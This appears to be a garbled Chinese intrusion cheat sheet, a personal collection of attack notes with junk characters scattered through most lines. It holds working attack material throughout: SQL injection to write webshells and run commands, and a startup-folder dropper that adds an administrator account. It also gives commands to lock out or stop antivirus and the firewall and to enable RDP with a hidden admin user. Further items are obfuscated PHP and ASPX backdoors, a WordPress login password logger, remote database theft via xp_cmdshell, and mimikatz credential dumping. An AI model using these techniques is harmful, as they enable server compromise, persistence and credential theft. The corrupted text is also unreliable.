2 v1 r! |9 N! ~. Jdrop table a;
+ {/ C+ w. ?3 ~) Z# V- {! I9 U P# H& g
英文版本:5 v- M# Y- P2 A, m$ m/ L& z8 x
0 Z6 O/ \* c0 M( b
use test;$ w7 {' H- F& h- G! A
create table a (cmd text);- K6 y7 i* H0 E- _( ^
insert into a values ("set wshshell=createobject (""wscript.shell"") " );; p+ ]/ d" K7 m! ]6 f+ ~8 s& C
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );* j2 n! p2 f7 [
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );' ?3 ]) L0 \5 i7 W1 \
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
2 d8 U2 z* e* x8 P/ J) Bdrop table a;! r) A# }4 B. S& H
3 x6 F+ i. ^' ]8 o3 ^
create table a (cmd BLOB);
0 v- c: F8 A# ^insert into a values (CONVERT(木马的16进制代码,CHAR));
& V4 W1 l0 v ]1 q& `' L: ~select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe') ~: |( s% q; b6 ^: T( r* s7 w% }- b R
drop table a;3 l% G4 z- @% o U" {
2 V) c Y, ]% X. h7 k( k) T
记录一下怎么处理变态诺顿% |. f% M$ V, b! T
查看诺顿服务的路径
6 Z& i3 }1 Z p" ~sc qc ccSetMgr
) @$ j% @$ A. |6 a6 F然后设置权限拒绝访问。做绝一点。。* R4 E- z$ Y; P/ h- _2 u E
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
/ Q; W' U1 w5 z+ G% ?: i. \cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
* w/ M( Y" ^, R) ~$ ~& ~cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
5 C2 u: u, W, r7 M2 G, F& Mcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone) h# U2 n4 C2 J9 [8 U% f1 F
, O+ z8 C' ~" b然后再重启服务器
* x; M W& \$ S* d- j: L* Niisreset /reboot
6 `4 C$ |. ~' P0 `4 O这样就搞定了。。不过完事后。记得恢复权限。。。。
; @8 h6 m* k9 m: e( Y0 W7 ecacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
( a7 M) H1 n# u; a: a8 |+ A& p4 Q9 {cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
+ z9 i* x/ Z! S9 v" k+ ccacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
% t1 l5 W, M7 U; @cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
# f r; ]1 l0 L' I. ~" ~SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin0 }8 H* `1 T2 b
7 ?. I; b+ J+ H. v
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
% U8 {2 P2 E7 I" P) w4 g' P5 K
( l% X$ C- j7 |% b' Dpostgresql注射的一些东西) ^# `' g" ~+ V
如何获得webshell
m/ W3 s: }- |1 f# t7 e1 b, }& I5 Qhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
- Z. S4 B; E6 Q9 z6 g9 J. Shttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
# _+ v/ Z! B& H2 x+ zhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;4 w h" T u+ G B5 ]4 r6 J( q
如何读文件
. C- j9 F9 r a- R8 y' ]. Dhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
) W& I( X8 k- n* E Jhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
, D! W. I5 H0 W$ D# V4 }4 N5 Phttp://127.0.0.1/postgresql.php?id=1;select * from myfile;6 b3 a; N8 d7 `
+ Q& g& O) C+ S9 `% J1 f
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
6 g3 Q6 C6 O. u; |# y0 ?当然,这些的postgresql的数据库版本必须大于8.X
; Y, F9 }: p# {" y6 X; n创建一个system的函数:
- q9 R1 R) Z7 O8 o. I$ R( v0 lCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
3 i1 M6 @! m$ e4 t8 X0 t
) k7 z+ o7 d j* }: r1 @: D创建一个输出表:
/ G% F0 o. c5 yCREATE TABLE stdout(id serial, system_out text)
* e; m8 r7 h/ {& L/ |# ]! v0 b* f
) W$ s# V0 D+ r, R5 L执行shell,输出到输出表内:" k, B' r$ L2 x( l K: V" g( E
SELECT system('uname -a > /tmp/test')
% G' x- D- ?: A% ]
. f. L7 F& l" q$ l$ y& v$ x; X! Ocopy 输出的内容到表里面;
$ w$ `# [9 F3 ~- SCOPY stdout(system_out) FROM '/tmp/test'
( f- ?4 i8 ~; k% Z/ T8 F. w3 `
_2 s) _: H" ~. g* k( K从输出表内读取执行后的回显,判断是否执行成功
Z: Z$ U* M; ~+ f- B& \" n8 y3 N. P( O! j+ S
SELECT system_out FROM stdout' o* I/ h/ x$ e* j) A! T) N& I
下面是测试例子
- _$ V ~ h7 Y) n! T
5 w- n. ~! q+ W( Z2 E( r( g/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
' c8 Y* r" c; C p- g/ g
" {# E% v4 G7 Y3 o [/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
, C, U9 ^6 W5 b4 tSTRICT --
. O, W' G# U2 N; m1 D2 V$ i
6 }8 E: e3 E5 S% M/store.php?id=1; SELECT system('uname -a > /tmp/test') --
! W) v; T: G9 D; E' v- ^4 z7 V2 R) D' P' V6 |+ b; _: k8 ~+ E
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
( x6 F3 ]7 a- [9 p8 S' F
5 Q, v/ p/ f7 @/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--# F! C% G, }$ z7 D/ }9 k& M
net stop sharedaccess stop the default firewall
8 B1 L3 L* s9 ]8 G; f' B3 ^, v4 Inetsh firewall show show/config default firewall, Q" P5 a# x& l7 v5 l
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
- P- [( r- M) `. d/ y) h' ^9 Gnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall, L5 t7 `0 g& X& O. ]0 _
修改3389端口方法(修改后不易被扫出)
4 r# F, ]; X" V, Q4 U" M修改服务器端的端口设置,注册表有2个地方需要修改+ e( D& H# `& t) V2 w7 b+ \ a
2 d; Y; E% F& Y! }1 }; g2 ]
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
. u! w- E0 N9 X; g, dPortNumber值,默认是3389,修改成所希望的端口,比如6000
. K# k# G4 R8 j( A
$ ]5 j6 b+ I- Y) P6 Z; W% }第二个地方:
8 V* o( I# V4 G2 O[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] # a4 g: d! m$ K7 e
PortNumber值,默认是3389,修改成所希望的端口,比如6000# }$ J: D- G# U
. N% T: w$ E: T0 z* p) m3 R# O
现在这样就可以了。重启系统就可以了4 {5 f1 S+ [0 O. i" w
+ S0 F, O+ C8 q7 Q$ \# f查看3389远程登录的脚本$ o1 e( A2 _1 u" ^2 ?- Z
保存为一个bat文件6 n3 M5 ~( B. H0 P: b
date /t >>D:\sec\TSlog\ts.log" Y) i) }, ~3 Q2 o. N
time /t >>D:\sec\TSlog\ts.log; `# {6 W! D( K5 m/ h
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
! \ f* p2 d6 m8 P( V9 O2 Gstart Explorer
- f q! x0 f" N* Q$ i- u
% P( B; ~$ _" A& l* K1 R/ r1 ~mstsc的参数:& T$ q# o3 T; M
. l9 T$ _ f- X7 u
远程桌面连接! T+ }9 G9 a3 l8 z5 K# Q& N( D
% S, a1 v! R% Q0 PMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]] f* H2 G8 W. _; A8 |
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?3 R9 c0 U9 {+ A9 Y. q& c/ t* J
) ^# q8 ?$ Z8 n' V" f9 _<Connection File> -- 指定连接的 .rdp 文件的名称。
0 Q" E: N' k4 T$ H
- T3 ]# [7 _0 A( ? H% ]/ j/v:<server[:port]> -- 指定要连接到的终端服务器。
; k& |. e, R9 B a9 {3 w/ P0 x. d2 c' S3 U
/console -- 连接到服务器的控制台会话。 U4 _% s, q0 I4 G$ L1 e
" P; l3 w. u! q0 s$ I V4 [8 F/f -- 以全屏模式启动客户端。
- |9 [8 k* {0 E4 e9 f" k
0 O; b1 @) p8 b+ ]/w:<width> -- 指定远程桌面屏幕的宽度。
8 ]0 n, d9 O9 c
- S8 ?, E, a. G7 z* r/h:<height> -- 指定远程桌面屏幕的高度。
/ w# }' s7 r: s3 L+ V+ I3 t" U4 q: F
/edit -- 打开指定的 .rdp 文件来编辑。* C" A1 Q# G& I0 a
+ s- {0 T l/ ]; C" u* R; v9 P0 N- X/migrate -- 将客户端连接管理器创建的旧版# e9 w3 e6 l7 x7 [' e g5 E
连接文件迁移到新的 .rdp 连接文件。
1 Y$ ?4 J9 V2 r1 Z9 ?; c& ~) o& r' D" X' U
* l, ^2 B7 j- R' C, [% s其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就8 u1 W! G1 ~3 v6 c
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
) w) v6 Y+ p" Z- c
3 d: M: @8 ?$ U( |" P: H8 {9 z命令行下开启3389/ w- K! L0 R( S7 e
net user asp.net aspnet /add! ]* }, l) r( L7 _+ @
net localgroup Administrators asp.net /add
2 C: K8 V D, ynet localgroup "Remote Desktop Users" asp.net /add% ^3 E) C9 j6 G: U( |# T, v( M) a" ]
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
! D' j) ~) s: `* w$ \echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
/ m+ J) a, D' ?% p$ F7 recho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1; ]) ^" G4 q5 X% U( k
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f# N4 r9 P5 T4 a I( F
sc config rasman start= auto
4 j' d& B! a Z, `( M. T" Dsc config remoteaccess start= auto
3 z6 }, c6 C' q& i7 q9 F1 I& xnet start rasman
& G( b- s8 b3 g* J8 A3 e ?* q9 C& knet start remoteaccess8 U% x/ z9 q9 x1 x2 W
Media* s L/ x" d1 i6 q
<form id="frmUpload" enctype="multipart/form-data"
5 K; V1 j' e9 U( E% \action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>. d6 G2 c. \/ F8 H; ]/ e
<input type="file" name="NewFile" size="50"><br>
- p3 D: n" i/ ?: U F1 Y<input id="btnUpload" type="submit" value="Upload">
' Z* B7 k5 i( P* }6 S$ s</form>) I3 b+ s( A4 ?3 w8 d
4 p0 F( y: ]+ x0 s" A, \3 Rcontrol userpasswords2 查看用户的密码* F) a5 [0 v* T8 Y/ D% k
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
; J0 T0 m- A. y8 U. ?& VSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a0 H4 d, V( F5 b% ]2 j& K4 ?6 a! ]2 ?
# [+ a- [* i6 S* X' \3 t% {" {
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
$ r" L5 ^/ C; q9 L9 D1 d! W1 o测试1:, |1 m% R. Q' j' T6 F; T
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1( M6 W# J: T) z
- }8 m% L* J8 ]) w/ @1 H
测试2:
8 r) h- M1 _/ C. A6 A# }" k R3 A. m& j+ W+ B
create table dirs(paths varchar(100),paths1 varchar(100), id int)
* M' C$ Q$ ]0 T7 O- r+ L# p
5 ^. e9 W5 V/ k' }delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
% j2 ?1 V D) A
" N0 T) _9 n0 Z, G& l) TSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
N0 A5 T! m9 W( c6 ~' u关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
/ l, c6 r8 |' S$ r可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;( S; ~/ l1 \; Q, S4 }6 H
net stop mcafeeframework& h, h, X( n) e. `
net stop mcshield, [+ f8 @0 P/ o1 D
net stop mcafeeengineservice
9 W3 W" D: s4 ] y9 mnet stop mctaskmanager
( t- r2 `6 H0 k) b! uhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
# h/ b+ R" W4 Q2 h# e& k/ {
/ I+ E8 |) h$ x VNCDump.zip (4.76 KB, 下载次数: 1)
3 w j: \5 m4 _$ |! s# [密码在线破解http://tools88.com/safe/vnc.php' s( K. D) g6 ~, [. x( z
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取8 \% K8 i8 j# w; ^' l3 j
% u+ z9 J2 T/ K0 @( V$ y/ K" a
exec master..xp_cmdshell 'net user'6 R6 d' Z& K+ r8 f3 H) c) {
mssql执行命令。3 s9 x2 j6 |+ Z
获取mssql的密码hash查询4 O p# H- K% S7 r
select name,password from master.dbo.sysxlogins
; P0 o9 G/ {2 ?1 ~' {2 e# T6 {5 o7 x: _$ U
backup log dbName with NO_LOG;( Z3 z! d4 }- q
backup log dbName with TRUNCATE_ONLY;
0 u% p* N4 r+ g+ X( l! [- Z$ o/ oDBCC SHRINKDATABASE(dbName);/ }7 ~0 n3 d( J. d
mssql数据库压缩
0 A# B. v. N6 g. m/ M& _5 t( U9 N3 B& X, j5 m; |$ L8 l
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK! h5 I. J/ k6 n+ [$ s
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
* a3 I; c( w# S$ R8 N5 k" i8 b1 p- X5 X, I
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
4 z/ T' {9 j+ c0 R* b0 V5 ]9 g备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
4 c1 ?: F+ `4 x5 j G8 M$ z: g) x! v7 b, R4 K
Discuz!nt35渗透要点:
' B# }! R2 k2 O% x2 X" Y(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default$ M* T0 H# |5 z, E% n }# `
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
5 s( v# U9 w4 q( g- q) U" v(3)保存。
" Q2 P! f# M7 P. G(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass* I7 p. q! E: R" q s1 N
d:\rar.exe a -r d:\1.rar d:\website\
0 U6 D3 Q8 Y Y% n2 M; h递归压缩website/ g9 I, W& l3 R8 B7 p8 _
注意rar.exe的路径( }8 Y+ V1 D" B6 l/ H
; T8 D4 A3 S) f<?php3 K3 `/ Z0 ^8 z6 E0 E k" @. l
: e% }1 N6 I: s E) B# ?9 z$telok = "0${@eval($_POST[xxoo])}";
# b) ^5 o( Y/ U. T& Z' d
/ _+ ~& M. H7 G }% V$username = "123456";0 s. I1 I2 ^) X# e0 y& \. r5 ~7 @& z
* B* O$ R- W3 B6 `
$userpwd = "123456";
& o, s% g9 u" r) I8 H2 o3 _/ W% P% a" X9 t0 j1 f; g% f" l
$telhao = "123456";
4 n9 I( I% u3 s5 S' v
, J T o2 N5 J+ L; x! i6 |, W$telinfo = "123456";
. F$ _ u c2 e- C2 h
- ^) g- s, T4 _# j?> L: t" |5 |: f i. ]* ?
php一句话未过滤插入一句话木马
, ]& l- J' H2 o$ Y+ W/ Z* m9 }/ |/ c( a" k' Z) U/ u0 A
站库分离脱裤技巧
( p; q8 i! W; K/ V/ g: \exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
/ E6 H8 v! K5 w3 J6 N9 I8 g+ g% \& ]exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'8 |6 G( v9 d+ G) T. R f9 J4 ^
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
6 Z9 o2 P# j5 N& n E3 l这儿利用的是马儿的专家模式(自己写代码)。
! l1 T! E2 U: F1 N3 iini_set('display_errors', 1);, z: N4 }+ T$ l
set_time_limit(0);* C% Y; a9 u/ l) S
error_reporting(E_ALL);! b. p, a$ _$ j. c3 r& a2 j
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());& w N# w0 H$ @0 i$ j0 ]8 S A P
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
. i! T' k, N$ l- r0 H6 D( b$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());5 S# k* S/ P8 Z/ Q* n0 s
$i = 0;
- @* g; Y* |! V+ s% ]$tmp = '';4 S+ h9 ?! _1 p3 p
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
& T) q2 G, b4 l' t* l" w2 _7 } $i = $i+1;$ B" B" P2 B4 p7 @4 I- X& X6 Y# S
$tmp .= implode("::", $row)."\n";
. E" |+ }8 Q1 a if(!($i%500)){//500条写入一个文件
( o, X# S1 C, A( Q4 R $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
3 C! _. h+ u+ q1 |8 P; A: Z2 u file_put_contents($filename,$tmp);
: C0 p$ R ], Q$ C$ Y $tmp = '';% e3 p9 g: ~, w
}- @- E b6 c) J/ ]
}. k$ O8 Y1 r2 J% v' C
mysql_free_result($result);* L+ q4 l* l7 I1 N
7 U( J7 x! h$ n( R; M, A0 K$ V5 V \# E' U. r- b% s+ v
6 @6 W5 x& _3 r! l3 O//down完后delete
3 e8 w! q! V! a- ], ?$ ]! H5 ]2 p. V6 O6 @
7 u: z1 d7 I' a. }2 O
ini_set('display_errors', 1);# N; P5 h2 Z, K2 M
error_reporting(E_ALL);7 y3 U3 p/ q6 n$ w7 q7 W
$i = 0;
: e' H+ F# A: twhile($i<32) {8 R3 Q( ^& g! y0 o2 Y
$i = $i+1;
, c3 x* b1 e) n' b' d0 J/ D $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
% N) t( ?* Y) v* a unlink($filename);
4 R* Z7 F% O8 ^; S0 w/ i: |# V* M}
/ Q+ P* i, z" I1 w, X# h4 G+ rhttprint 收集操作系统指纹
* O) ^; g* b4 l1 K扫描192.168.1.100的所有端口
7 u; o% ^ j4 ~& c8 onmap –PN –sT –sV –p0-65535 192.168.1.100
* @ d7 g+ r- m0 r* i6 yhost -t ns www.owasp.org 识别的名称服务器,获取dns信息6 L0 B I: y$ N: i
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
p1 D, _ [( r8 t0 p1 v5 {Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
" R/ [3 Y6 n0 S+ v7 e( f" O
, T% m# \+ @, h! L& `# b/ ?Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
* r. N e J8 U. `& L/ p7 o" L/ O* ^( v/ Z
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
( Z% V8 d- ?% d5 t* V+ R: C( c; }1 {% L) l% I
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
, _9 g( x- c# }' D! F
! |' V& X X# V7 Q0 ]$ b DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
\3 T$ [. R8 M0 }! R& K9 w
" ^2 J4 E4 m% P7 ~% K http://net-square.com/msnpawn/index.shtml (要求安装)
. E6 j0 r, t# B, D
" O- |/ V: N3 R! B) ? tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)/ P; Y: ?1 x* H1 Q
# A# N+ g6 s, z+ x
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
' N* n! b) \4 C. j, \. _set names gb2312
# Q! f s* Y' u* u导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。( o8 P7 D! f) ?: g8 z6 f
4 g. A. s3 y# w! E; c. s! b
mysql 密码修改
0 N# y9 `& W8 m4 pUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” - K# P- y, p- g
update user set password=PASSWORD('antian365.com') where user='root';. H2 ~& s% ]/ R" a; V( ~6 N ^
flush privileges;
8 ^, L' p% g/ [& e5 h高级的PHP一句话木马后门
4 C7 x4 U* t5 {; J
2 p4 t% F! F* @3 E入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
7 F" d. J# i9 ]* w! n% V c& W* C, |6 K* U) B* L8 Z" D9 C7 B: B
1、$ b }8 S' y: j3 U4 @
' y# w2 j+ O2 t! c7 w+ f5 B- z* L% J& w( f
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";2 O+ u {3 q2 E- s: Q& P; E2 I1 d
& J0 ]) |6 w) e4 {! F4 W$ y9 l$hh("/[discuz]/e",$_POST['h'],"Access");
; g2 k6 ?" }5 _( z% y2 y) [% M) {% v6 z+ J5 T$ p6 P
//菜刀一句话5 U: V( o7 E0 V1 `- l4 r0 Q; X7 ]
. X& S& L, S) M0 H6 p3 q
2、
) y) [8 x2 k$ p* O# r5 s' V8 s+ e# w8 T* j {
$filename=$_GET['xbid'];
k; v2 Z f" I. N( B( z2 H2 J2 T. t8 l1 l
include ($filename);
- D! v# o; w3 I; Q7 [0 P- Q/ j1 m/ |+ j
//危险的include函数,直接编译任何文件为php格式运行
; \7 S6 D7 k2 n8 _* P/ r
% V0 d4 w1 K3 G3、
' _( c7 K0 C: U( Y
+ P- J7 O9 ~: Q5 ?7 F/ k$reg="c"."o"."p"."y";7 ?2 n5 {% c4 Y1 O7 U3 |
w5 g% \1 z h2 i1 {7 n/ C
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
1 G/ [' ^* p1 g0 o% H, t$ q7 t. G/ B. U/ n. j" Y
//重命名任何文件! Z! W# V3 n5 p7 L7 F6 T4 L
# o; \, j2 q M$ P0 B+ }4、3 G5 A" ~( u$ ~# W# L' \
( s* ~6 S5 Y( `2 R! H# l. }3 R q( ?$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";8 w H5 V$ S! a
7 Q( R* H- S. q& D$ X& N
$gzid("/[discuz]/e",$_POST['h'],"Access");
+ U% y' n! T- Z- t& {
' X% J5 F. _2 \0 R//菜刀一句话
* B9 r& b, R+ W6 \: {; T. r4 f( G9 W7 |- ]* z S' a
5、include ($uid);) ~# L N9 I5 e8 d9 N, ^; Z
1 _; o# O% X3 Q/ U7 ~5 b+ p; H: L//危险的include函数,直接编译任何文件为php格式运行,POST 5 X) B* {1 L9 t: ]1 ?8 u
4 [- ~: r1 j7 M- F; D8 n; b0 Z4 C
8 \ m5 o7 G8 H& z9 N
//gif插一句话. L$ F" f7 s# I9 y
( A4 _' v4 S" s3 ~5 h, A o8 w, K6、典型一句话% e9 k" T" i2 l7 v! ?# K: m" Q
1 I; i! ?9 O# G4 u, ? [6 I! A( ^
程序后门代码4 G" m9 }' j, J$ \: g
<?php eval_r($_POST[sb])?>+ V, E6 b! c% Y! | Y6 _+ T
程序代码
& h) X6 J# U- ?0 a7 q) x. }: W9 h<?php @eval_r($_POST[sb])?>
$ r; W: L" Z- N* l6 V" u& p: O s9 Z2 |//容错代码
5 r* B7 h3 k0 k& F9 N. f# P/ b程序代码+ ^% ~9 w3 ~" @ m
<?php assert($_POST[sb]);?>; Z2 ^+ h* g$ s6 j$ r5 F
//使用lanker一句话客户端的专家模式执行相关的php语句
; Y3 I; r# S. E( d/ `* }程序代码
) [% t& b6 @0 h; ~- o! {1 L<?$_POST['sa']($_POST['sb']);?>
/ K( h# ]. `$ i# s; w程序代码8 V- c+ B+ U2 c+ {$ a
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
) ^0 {- r. g7 t* O$ Y3 {4 k9 X程序代码
/ t2 {! \6 e; G" Z<?php
3 g* e0 c D7 F* u/ @5 _/ F. c@preg_replace("/[email]/e",$_POST['h'],"error");
8 c% ~8 k" p* Y2 N* P, M- h0 p?>& H, d! v. P) O0 k
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入7 }0 ^; B( y( j; d+ O
程序代码' f* Y: z, R/ @4 U- k
<O>h=@eval_r($_POST[c]);</O>, m; }; _# C7 p' q8 V c$ |
程序代码& X% O( Z' P# q5 }7 [# u
<script language="php">@eval_r($_POST[sb])</script>. k& I- X0 Z5 E P h& b; \' A
//绕过<?限制的一句话
0 w2 c. W" D' O1 A" n
6 k6 }' ^# g& nhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip' \4 F; t# x2 e6 x) |- Z% ]
详细用法:; W9 N2 a8 m7 K& ~; N
1、到tools目录。psexec \\127.0.0.1 cmd* ~( O) a% N, [1 x1 a. S. b; ?! O
2、执行mimikatz
) c) {" r. ^" _9 a R# @' [3、执行 privilege::debug3 @4 t" F8 L" w, s
4、执行 inject::process lsass.exe sekurlsa.dll% Y9 T, d( W( H* a, V D+ j0 c
5、执行@getLogonPasswords
8 A, Y3 E e, V- E* _3 Y6 G6、widget就是密码
/ L2 U) ~- y5 ?; t. N' C7、exit退出,不要直接关闭否则系统会崩溃。% o. [- m% ^# k& i8 l6 l
, y: _* T4 a3 S& zhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
$ w6 |$ S2 B3 ^& F/ J
- w% ~9 N. N( g: C" H1 Z m$ S& T自动查找系统高危补丁
' e8 _4 C A' S) K5 ` gsysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
7 `0 `* y9 N8 \1 L. G) |9 @; @# g6 E" c: ?
突破安全狗的一句话aspx后门
7 ~- M+ C% `2 @2 Q {, {<%@ Page Language="C#" ValidateRequest="false" %>
3 Z, x' n& W# M& V2 `$ [" D& [8 S<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
" O3 I6 X* F5 M, z( fwebshell下记录WordPress登陆密码- \; H! L, J) }
webshell下记录Wordpress登陆密码方便进一步社工
' q, `0 ^1 |/ H7 F$ U' d0 W1 }0 I7 j在文件wp-login.php中539行处添加:# T) [% H# b( q2 ?' `9 o0 L5 l7 @
// log password
" g% t: z9 h) ]8 L% G4 i$log_user=$_POST['log'];
5 _0 m! G6 c& E; ^& Z/ P$log_pwd=$_POST['pwd'];
0 x* a% {0 n' s! E& c- Y b$log_ip=$_SERVER["REMOTE_ADDR"];
) ^) A. h$ u& C0 I6 e$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
3 b* c$ ~1 g' I& b, U$txt=$txt.”\r\n”;* J. V, a8 h' G7 ?, ]1 o$ \8 L
if($log_user&&$log_pwd&&$log_ip){
$ O7 N! Z' n8 b4 n* U- r$ w@fwrite(fopen(‘pwd.txt’,”a+”),$txt);. p' ^6 L O) s& Q
}
5 g2 {) N! P7 X$ L+ D* d: B当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。- C: ]/ }( K2 J6 X3 h* d6 u
就是搜索case ‘login’
/ v" b% k& [' {在它下面直接插入即可,记录的密码生成在pwd.txt中,
9 D3 C* R; a/ R: b: Q其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录& e- K+ @6 k" h, M5 j/ R% }
利用II6文件解析漏洞绕过安全狗代码:8 j. ~4 ^/ q" G8 f* _
;antian365.asp;antian365.jpg5 p! k8 H3 z4 K" q6 E/ W
& u m. A' W* ~# A' _" q
各种类型数据库抓HASH破解最高权限密码!; `; ~) H6 F+ e9 D9 A8 ] f
1.sql server2000& L7 H0 Y. y- d+ }' b, f9 o1 q
SELECT password from master.dbo.sysxlogins where name='sa'1 u# W/ I3 u6 K; l9 k
